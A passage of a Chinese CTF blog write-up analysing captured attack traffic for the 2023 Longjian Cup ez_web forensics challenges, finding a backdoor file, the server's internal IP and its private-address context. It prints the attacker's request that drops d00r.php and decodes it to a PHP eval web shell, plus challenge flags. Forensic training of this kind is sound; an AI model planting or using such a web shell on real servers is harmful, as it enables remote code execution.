<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/32x32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/16x16.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/blue/pace-theme-bounce.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous" defer></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"wanth3f1ag.top","root":"/","images":"/images","scheme":"Gemini","darkmode":true,"version":"8.26.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"atom-one-dark","dark":"atom-one-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":true,"style":"mac"},"fold":{"enable":true,"height":500},"language":false},"bookmark":{"enable":true,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>
<script>
  (function () {
    var OriginTitle = document.title;
    var titleTime;
    document.addEventListener('visibilitychange', function () {
      if (document.hidden) {
        document.title = '坏人！看完了就想走' + OriginTitle;
        clearTimeout(titleTime);
      } else {
        document.title = '(*´∇｀*)你回来啦~' + OriginTitle;
        titleTime = setTimeout(function () {
          document.title = OriginTitle;
        }, 2000);
      }
    });
  })();
</script>

    <meta name="description" content="陇剑杯2023wp">
<meta property="og:type" content="article">
<meta property="og:title" content="陇剑杯2023wp">
<meta property="og:url" content="https://wanth3f1ag.top/2025/04/21/%E9%99%87%E5%89%91%E6%9D%AF2023wp/index.html">
<meta property="og:site_name" content="root@wanth3f1ag">
<meta property="og:description" content="陇剑杯2023wp">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250421234139409.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250421234222479.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250421234955034.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250421235111556.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250421235435744.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422000105027-1745251266384-6.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422000152282.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422000742058.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422001440773.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422002720002.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422002735298.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422002815511.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422224654952.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422225542593.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250423215716800.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422230537037.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422230623860.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250423221859531.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250423221841317.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250423222055379.png">
<meta property="og:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250423222130556.png">
<meta property="article:published_time" content="2025-04-21T15:25:18.000Z">
<meta property="article:modified_time" content="2025-12-01T11:03:43.461Z">
<meta property="article:author" content="wanTh3flag">
<meta property="article:tag" content="陇剑杯2023">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://wanth3f1ag.top/image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250421234139409.png">


<link rel="canonical" href="https://wanth3f1ag.top/2025/04/21/%E9%99%87%E5%89%91%E6%9D%AF2023wp/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://wanth3f1ag.top/2025/04/21/%E9%99%87%E5%89%91%E6%9D%AF2023wp/","path":"2025/04/21/陇剑杯2023wp/","title":"陇剑杯2023wp"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>陇剑杯2023wp | root@wanth3f1ag</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script><script src="/js/bookmark.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>





  <script src="/js/third-party/pace.js" defer></script>


  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">root@wanth3f1ag</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">CTFer</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="s4arch" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-h0me"><a href="/" rel="section"><i class="home fa-fw"></i>H0me</a></li><li class="menu-item menu-item-a6out"><a href="/about/" rel="section"><i class="user fa-fw"></i>A6out</a></li><li class="menu-item menu-item-t6gs"><a href="/tags/" rel="section"><i class="tags fa-fw"></i>T6gs</a></li><li class="menu-item menu-item-catagories"><a href="/categories/" rel="section"><i class="th fa-fw"></i>Catagories</a></li><li class="menu-item menu-item-links"><a href="/links/" rel="section"><i class="link fa-fw"></i>L1nks</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>s4arch
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%99%87%E5%89%91%E6%9D%AF-2023-ez-web%EF%BC%88%E4%B8%80%EF%BC%89"><span class="nav-number">1.</span> <span class="nav-text">[陇剑杯 2023]ez_web（一）</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%87%AA%E5%B8%A6%E5%90%8E%E9%97%A8%E6%96%87%E4%BB%B6"><span class="nav-number">1.1.</span> <span class="nav-text">#服务器自带后门文件</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%99%87%E5%89%91%E6%9D%AF-2023-ez-web%EF%BC%88%E4%BA%8C%EF%BC%89"><span class="nav-number">2.</span> <span class="nav-text">[陇剑杯 2023]ez_web（二）</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%86%85%E7%BD%91ip"><span class="nav-number">2.1.</span> <span class="nav-text">#服务器内网ip</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ifconfig%E5%91%BD%E4%BB%A4"><span class="nav-number">2.2.</span> <span class="nav-text">ifconfig命令</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%86%85%E7%BD%91ip"><span class="nav-number">2.3.</span> <span class="nav-text">什么是内网ip</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%86%85%E7%BD%91ip%E7%9A%84%E8%8C%83%E5%9B%B4"><span class="nav-number">2.4.</span> <span class="nav-text">内网ip的范围</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#IPv4-%E5%9C%B0%E5%9D%80%E5%88%86%E7%B1%BB"><span class="nav-number">2.5.</span> <span class="nav-text">IPv4 地址分类</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%99%87%E5%89%91%E6%9D%AF-2023-ez-web%EF%BC%88%E4%B8%89%EF%BC%89"><span class="nav-number">3.</span> <span class="nav-text">[陇剑杯 2023]ez_web（三）</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Base64-%E7%BC%96%E7%A0%81%E7%9A%84-ZIP-%E5%8E%8B%E7%BC%A9%E6%96%87%E4%BB%B6"><span class="nav-number">3.1.</span> <span class="nav-text">#Base64 编码的 ZIP 压缩文件</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%99%87%E5%89%91%E6%9D%AF-2023-hard-web-1"><span class="nav-number">4.</span> <span class="nav-text">[陇剑杯 2023]hard_web_1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9F%A5%E7%9C%8B%E5%BC%80%E6%94%BE%E7%AB%AF%E5%8F%A3%EF%BC%88TCP%E4%B8%89%E6%AC%A1%E6%8F%A1%E6%89%8B%EF%BC%89"><span class="nav-number">4.1.</span> <span class="nav-text">#查看开放端口（TCP三次握手）</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%99%87%E5%89%91%E6%9D%AF-2023-hard-web-2"><span class="nav-number">5.</span> <span class="nav-text">[陇剑杯 2023]hard_web_2</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="wanTh3flag"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">wanTh3flag</p>
  <div class="site-description" itemprop="description">一条有梦想的咸鱼</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">180</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">27</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">121</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="/2323277194" title="qq → 2323277194" rel="noopener me"><i class="fab fa-qq fa-fw"></i>qq</a>
      </span>
  </div>
  <div class="cc-license animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="https://cdnjs.cloudflare.com/ajax/libs/creativecommons-vocabulary/2020.11.3/assets/license_badges/small/by_nc_sa.svg" alt="Creative Commons"></a>
  </div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://wanth3f1ag.top/2025/04/21/%E9%99%87%E5%89%91%E6%9D%AF2023wp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="wanTh3flag">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="root@wanth3f1ag">
      <meta itemprop="description" content="一条有梦想的咸鱼">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="陇剑杯2023wp | root@wanth3f1ag">
      <meta itemprop="description" content="陇剑杯2023wp">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          陇剑杯2023wp
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-04-21 23:25:18" itemprop="dateCreated datePublished" datetime="2025-04-21T23:25:18+08:00">2025-04-21</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-12-01 19:03:43" itemprop="dateModified" datetime="2025-12-01T19:03:43+08:00">2025-12-01</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E8%B5%9B%E9%A2%98wp/" itemprop="url" rel="index"><span itemprop="name">赛题wp</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>5.9k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>5 分钟</span>
    </span>
</div>

            <div class="post-description">陇剑杯2023wp</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="陇剑杯-2023-ez-web（一）"><a href="#陇剑杯-2023-ez-web（一）" class="headerlink" title="[陇剑杯 2023]ez_web（一）"></a>[陇剑杯 2023]ez_web（一）</h1><h2 id="服务器自带后门文件"><a href="#服务器自带后门文件" class="headerlink" title="#服务器自带后门文件"></a>#服务器自带后门文件</h2><p>问题：服务器自带的后门文件名是什么？（含文件后缀）<br>得到的答案使用NSSCTF{}格式提交</p>
<p>解题：</p>
<p>因为是需要查找服务器自带的文件，所以可以猜测攻击者是否会进行目录扫描操作，如果有对目录进行扫描的话我们就可以借助扫描的结果去找到存在的文件</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250421234139409.png" alt="image-20250421234139409"></p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250421234222479.png" alt="image-20250421234222479"></p>
<p>这里可以看到d00r.php文件访问的状态码是200并且传入system(“whoami”)也正常执行并返回www，一开始以为是这个d00r.php，但是提交是错误的，那我们看看这个d00r.php是怎么生成的</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">http</span> <span class="keyword">contains</span> <span class="string">&quot;d00r.php&quot;</span></span><br></pre></td></tr></table></figure>

<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250421234955034.png" alt="image-20250421234955034"></p>
<p>可以看到一个跟d00r不相干的数据包出现了，我们跟进看一下</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250421235111556.png" alt="image-20250421235111556"></p>
<p>可以看到一开始访问&#x2F;e&#x2F;public&#x2F;ViewClick&#x2F;ViewMore.php的时候文件是存在的，并且在流量包中看到了对d00r.php文件的创建</p>
<figure class="highlight mel"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">a=file_put_contents%28%27d00r.php%27%2C+base64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs%2FPg%3D%3D%27%29%29%3B</span><br><span class="line"></span><br><span class="line">URL解码后内容为</span><br><span class="line">a=file_put_contents(<span class="string">&#x27;d00r.php&#x27;</span>, base64_decode(<span class="string">&#x27;PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==&#x27;</span>));</span><br><span class="line"></span><br><span class="line">PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==在base64解码后内容为：</span><br><span class="line">&lt;?php <span class="keyword">eval</span>($_POST[<span class="string">&#x27;cmd&#x27;</span>]);?&gt;</span><br></pre></td></tr></table></figure>

<p>并且用过滤器搜寻了这个文件</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250421235435744.png" alt="image-20250421235435744"></p>
<p>很明显，我们的d00r.php文件是通过&#x2F;e&#x2F;public&#x2F;ViewClick&#x2F;ViewMore.php文件去生成的，并且ViewMore.php文件之前并没有创建的痕迹，所以&#x2F;e&#x2F;public&#x2F;ViewClick&#x2F;ViewMore.php文件是服务器自带的后门文件</p>
<figure class="highlight dust"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="language-xml">NSSCTF</span><span class="template-variable">&#123;ViewMore.php&#125;</span></span><br></pre></td></tr></table></figure>

<h1 id="陇剑杯-2023-ez-web（二）"><a href="#陇剑杯-2023-ez-web（二）" class="headerlink" title="[陇剑杯 2023]ez_web（二）"></a>[陇剑杯 2023]ez_web（二）</h1><h2 id="服务器内网ip"><a href="#服务器内网ip" class="headerlink" title="#服务器内网ip"></a>#服务器内网ip</h2><p>问题：服务器内网IP是多少？<br>得到的答案使用NSSCTF{}格式提交</p>
<p>解题：</p>
<p>在d00r.php的利用中我们可以看到攻击者曾传入许多命令，也包括ifconfig</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422000105027-1745251266384-6.png" alt="image-20250422000105027"></p>
<h2 id="ifconfig命令"><a href="#ifconfig命令" class="headerlink" title="ifconfig命令"></a>ifconfig命令</h2><p><code>ifconfig</code>（<strong>Interface Configurer</strong>）是 Linux&#x2F;Unix 系统中用于查看和配置网络接口（网卡）信息的经典命令。</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422000152282.png" alt="image-20250422000152282"></p>
<p>我们分析一下这个内容</p>
<p>这里一共有五个网络接口</p>
<ul>
<li>**<code>br-2fc7bfd07160</code>**：Docker 自定义网桥</li>
<li>**<code>docker0</code>**：Docker 默认网桥</li>
<li>**<code>ens33</code>**：物理网卡（主网络）</li>
<li>**<code>ens38</code>**：物理网卡（第二网络）</li>
<li>**<code>lo</code>**：本地回环接口</li>
</ul>
<p>最后一个本地回环接口我们就不说了，是最常见的本地回环测试地址127.0.0.1</p>
<p>关键在于这两个物理网卡</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">ens33</span>: flags=<span class="number">4163</span>&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu <span class="number">1500</span></span><br><span class="line">        <span class="attribute">inet</span> <span class="number">192.168.162.130</span>  netmask <span class="number">255.255.255.0</span>  broadcast <span class="number">192.168.162.255</span></span><br><span class="line">        <span class="attribute">inet6</span> fe80::ae06:<span class="number">234</span>d:<span class="number">1</span>e0a:<span class="number">9</span>aac  prefixlen <span class="number">64</span>  scopeid <span class="number">0</span>x20&lt;link&gt;</span><br><span class="line">        <span class="attribute">ether</span> <span class="number">00</span>:<span class="number">0</span>c:<span class="number">29</span>:<span class="number">08</span>:<span class="number">04</span>:<span class="number">89</span>  txqueuelen <span class="number">1000</span>  (Ethernet)</span><br><span class="line">        <span class="attribute">RX</span> packets <span class="number">397410</span>  bytes <span class="number">398085633</span> (<span class="number">398</span>.<span class="number">0</span> MB)</span><br><span class="line">        <span class="attribute">RX</span> errors <span class="number">0</span>  dropped <span class="number">0</span>  overruns <span class="number">0</span>  frame <span class="number">0</span></span><br><span class="line">        <span class="attribute">TX</span> packets <span class="number">140095</span>  bytes <span class="number">20078864</span> (<span class="number">20</span>.<span class="number">0</span> MB)</span><br><span class="line">        <span class="attribute">TX</span> errors <span class="number">0</span>  dropped <span class="number">0</span> overruns <span class="number">0</span>  carrier <span class="number">0</span>  collisions <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="attribute">ens38</span>: flags=<span class="number">4163</span>&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu <span class="number">1500</span></span><br><span class="line">        <span class="attribute">inet</span> <span class="number">192.168.101.132</span>  netmask <span class="number">255.255.255.0</span>  broadcast <span class="number">192.168.101.255</span></span><br><span class="line">        <span class="attribute">inet6</span> fe80::<span class="number">68</span>af:<span class="number">1</span>a5:a54c:<span class="number">7366</span>  prefixlen <span class="number">64</span>  scopeid <span class="number">0</span>x20&lt;link&gt;</span><br><span class="line">        <span class="attribute">ether</span> <span class="number">00</span>:<span class="number">0</span>c:<span class="number">29</span>:<span class="number">08</span>:<span class="number">04</span>:<span class="number">93</span>  txqueuelen <span class="number">1000</span>  (Ethernet)</span><br><span class="line">        <span class="attribute">RX</span> packets <span class="number">362</span>  bytes <span class="number">35928</span> (<span class="number">35</span>.<span class="number">9</span> KB)</span><br><span class="line">        <span class="attribute">RX</span> errors <span class="number">0</span>  dropped <span class="number">0</span>  overruns <span class="number">0</span>  frame <span class="number">0</span></span><br><span class="line">        <span class="attribute">TX</span> packets <span class="number">1654</span>  bytes <span class="number">141760</span> (<span class="number">141</span>.<span class="number">7</span> KB)</span><br><span class="line">        <span class="attribute">TX</span> errors <span class="number">0</span>  dropped <span class="number">0</span> overruns <span class="number">0</span>  carrier <span class="number">0</span>  collisions <span class="number">0</span></span><br></pre></td></tr></table></figure>

<p>从该http流可以看到</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422000742058.png" alt="image-20250422000742058"></p>
<p>上面显示的目标ip是192.168.162.130，就是服务器公网ip，也就对应了主网络的物理网卡</p>
<p>所以192.168.101.132就是他的内网ip</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">NSSCTF</span>&#123;<span class="number">192.168.101.132</span>&#125;</span><br></pre></td></tr></table></figure>

<p>那我们这里需要科普一下，什么是内网ip，内网ip的范围是多少</p>
<h2 id="什么是内网ip"><a href="#什么是内网ip" class="headerlink" title="什么是内网ip"></a>什么是内网ip</h2><p>内网（<strong>内部网络</strong>，也称为<strong>私有网络</strong>或<strong>局域网 LAN</strong>）是指在一个组织、家庭或特定范围内建立的封闭网络环境，<strong>不直接暴露在公共互联网上</strong>。内网中的设备可以互相通信，但通常需要通过网关（如路由器、防火墙）才能访问外网（Internet）。</p>
<h2 id="内网ip的范围"><a href="#内网ip的范围" class="headerlink" title="内网ip的范围"></a>内网ip的范围</h2><p>内网设备通常使用 <strong>RFC 1918</strong> 定义的私有 IP 地址范围，这些地址在互联网上不可路由：</p>
<ul>
<li>**<code>10.0.0.0/8</code>**（<code>10.0.0.0</code> ~ <code>10.255.255.255</code>）</li>
<li>**<code>172.16.0.0/12</code>**（<code>172.16.0.0</code> ~ <code>172.31.255.255</code>）</li>
<li>**<code>192.168.0.0/16</code>**（<code>192.168.0.0</code> ~ <code>192.168.255.255</code>）</li>
</ul>
<h2 id="IPv4-地址分类"><a href="#IPv4-地址分类" class="headerlink" title="IPv4 地址分类"></a><strong>IPv4 地址分类</strong></h2><p>在早期的 IPv4 分类中，IP 地址被分为 <strong>A、B、C、D、E 五类</strong>，其中 <strong>C 类地址</strong> 适用于小型网络：</p>
<table>
<thead>
<tr>
<th><strong>类别</strong></th>
<th><strong>IP 范围</strong></th>
<th><strong>默认子网掩码</strong></th>
<th><strong>适用场景</strong></th>
</tr>
</thead>
<tbody><tr>
<td>A 类</td>
<td><code>1.0.0.0</code> ~ <code>126.255.255.255</code></td>
<td><code>255.0.0.0</code></td>
<td>大型企业、运营商</td>
</tr>
<tr>
<td>B 类</td>
<td><code>128.0.0.0</code> ~ <code>191.255.255.255</code></td>
<td><code>255.255.0.0</code></td>
<td>中型企业、校园网</td>
</tr>
<tr>
<td><strong>C 类</strong></td>
<td><code>192.0.0.0</code> ~ <code>223.255.255.255</code></td>
<td><code>255.255.255.0</code></td>
<td><strong>小型局域网</strong></td>
</tr>
<tr>
<td>D 类</td>
<td><code>224.0.0.0</code> ~ <code>239.255.255.255</code></td>
<td>无（组播地址）</td>
<td>视频会议、流媒体</td>
</tr>
<tr>
<td>E 类</td>
<td><code>240.0.0.0</code> ~ <code>255.255.255.255</code></td>
<td>保留（实验用途）</td>
<td>未分配</td>
</tr>
</tbody></table>
<h1 id="陇剑杯-2023-ez-web（三）"><a href="#陇剑杯-2023-ez-web（三）" class="headerlink" title="[陇剑杯 2023]ez_web（三）"></a>[陇剑杯 2023]ez_web（三）</h1><p>问题：攻击者往服务器中写入的key是什么？<br>得到的答案使用NSSCTF{}格式提交</p>
<p>解题：</p>
<p>观察到一个流量</p>
<p><img src="/../image/achieve/202411/%E9%99%87%E5%89%91%E6%9D%AF2023/image-20250422001440773.png" alt="image-20250422001440773"></p>
